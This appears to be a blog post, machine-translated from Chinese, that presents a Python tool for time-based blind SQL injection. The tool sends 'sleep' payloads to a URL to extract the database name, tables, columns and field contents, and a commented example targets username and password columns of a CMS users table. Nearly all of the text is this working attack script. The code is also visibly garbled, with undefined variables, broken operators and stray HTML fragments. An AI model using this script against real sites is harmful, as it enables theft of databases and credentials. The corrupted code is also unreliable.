SQL injection: delayed injection of python script
import requests
import binascii
def judgment_delay(complete_url):
headers={<!-- -->
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
}
try:
requests.get(url=complete_url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout:
return "time out"
else:
return "normal"
def judgment_exploit(url):
payload=" and sleep(6) #"
complete_url=url + payload
num=judgment_delay(complete_url)
if "time out" in num:
print("[ + ] has a delay vulnerability")
else:
exit("[-] There is no delay vulnerability")
def content(url,need_boom,table_name):
num=len(need_boom)
for j in range(0,100):
if j==0:
print("[ + ] Explosive field content module started successfully")
print("[ + ] My little brain is working very fast, please wait...")
flag=0
mh=0
for k in need_boom:
print("------------------------------------------------ -------------------------------------------------- ---------------------------------------------")
mh + =1
for l in range(1,100):
flag1=0
for m in range(20,127):
payload=f" and if(ascii(substr((select {<!-- -->k} from {<!-- -->table_name} limit {<!-- -->j},1), {<!-- -->l},1))={<!-- -->m},sleep(5),1)"
complete_url = url + payload
if judgment_delay(complete_url) == "time out":
print(chr(m), end="")
flag=1
flag1=1
break
if flag1==0 and l>100:
exit("[ + ] Explosion is over. Thanks for using")
elif flag1==0:
break
if mh<num and flag==1:
print(':',end="")
print("------------------------------------------------ -------------------------------------------------- ----------------------------------")
if flag == 0:
break
def column_name(url,table_name,table):
print("[ + ] Field name blasting module started successfully")
print("[ + ] One Punch Man is charging....")
column_name_list=[]
for i in range(0, 100):
column_name = ""
print(f"[{<!-- -->i + 1}]:", end="")
flag = 0
for j in range(1, 100):
flag1 = 0
for k in range(20, 127):
payload = f" and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={<!-- -->table_name} limit {<!-- -->i}, 1),{<!-- -->j},1))={<!-- -->k},sleep(5),1) "
complete_url = url + payload
if judgment_delay(complete_url) == "time out":
print(chr(k), end="")
column_name + = chr(k)
flag1 = 1
flag=1
break
if flag1 == 0:
break
if flag == 0:
break
column_name_list.append(column_name)
print('\r')
print("\r")
if input("Whether you want to blast the content in the field (y/n):")=="y" or "Y" :
num=int(input("Please enter the number of fields to be blasted:"))
need_boom=[]
for i in range(0,num):
need_boom.append(column_name_list[int(input("Please enter the field number to be exploded:"))-1])
table_name=table
content(url,need_boom,table_name)
def table_name(url):
table_name_list=[]
for i in range(0,100):
table_name=""
print(f"[{<!-- -->i + 1}]:",end="")
flag=0
for j in range(1,100):
flag1=0
for k in range(20,127):
payload=f" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {<!-- -->i},1),{<!-- -->j} ,1))={<!-- -->k},sleep(5),1)"
complete_url=url + payload
if judgment_delay(complete_url) == "time out":
print(chr(k),end="")
table_name + =chr(k)
flag1=1
flag=1
break
if flag1==0:
break
print('\r')
if flag ==0:
break
table_name_list.append(table_name)
if input("Is the field to be exploded? (y/n):") == "y" or "Y":
table=table_name_list[int(input("Please enter the serial number of the field in which table you want to blast:"))-1]
table_name = "0x" + binascii.hexlify(table.encode()).decode()
column_name(url,table_name,table)
else:
exit("good bey")
def database_name(url,length):
print("[ + ] The pigeon is laying eggs...")
database_name=""
print("[ + ] database name",end=":")
for i in range(1,length + 1):
for j in range(20,127):
payload= f" and if(ascii(substr(database(),{<!-- -->i},1))={<!-- -->j},sleep(5),1) - - + "
complete_url=url + payload
if "time out" in judgment_delay(conplete_url):
database_name + =chr(j)
print(chr(j),end="")
break
print('\\
')
if input("Should the table name be exploded? (y/n):") == "y" or "Y" :
print("[ + ] The little brain is running fast...")
table_name(url)
else:
exit("Thanks for using!")
def database_length ():
length=0
url=input("Please enter url:")
judgment_exploit(url)
print("Calculating length...")
for i in range(1,1000):
payload=f" and if (length(database())={<!-- -->i},sleep(5),1)"
complete_url=url + payload
if "time out" in judgment_delay(conplete_url):
length=i
break
print("[ + ] The length of the database name is:",length)
if input("Do you want to explode the library name? (Y/N):") == 'y' or 'Y':
database_name(url,length)
else:
exit()
print("""
_ _____ _ _ _ _ _ _
| | | __ \ | | | | (_) (_) | | (_)
___ __ _| | | | | ___| | __ _ _ _ ___ __| | _ _ __ _ ___ ___| |_ _ ___ _ __
/ __|/ _` | | | | |/ _ \ |/ _` | | | |/ _ \/ _` | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
\__ \ (_| | | | |__| | __/ | (_| | |_| | __/ (_| | | | | | | __/ (__| |_| | (_) | | | |
|___/\__, |_| |_____/ \___|_|\__,_|\__, |\___|\__,_| |_|_| |_| |\ \___|\___|\__|_|\___/|_| |_|
| | __/ | _/ |
|_| |___/ |__/
---xl
Delayed injection script
Instructions
python3 delay_injection.py http://127.0.0.1:8080/Less-1/?id
help:
url=http://ip/cms/show.php?id=33
""")
# l=["username","password"]
# content(url="http://10.9.47.77/cms/show.php?id=33", need_boom=l,table_name='cms_users')
try:
database_length()
except requests.exceptions.MissingSchema:
exit("[-] Startup failed, please check whether the url is correct")
except NameError:
exit("[-] Startup failed, please check whether the environment is correct")
except KeyboardInterrupt:
exit("[-] User ends script")
exceptException:
exit("[-] User operation error")
Effect:
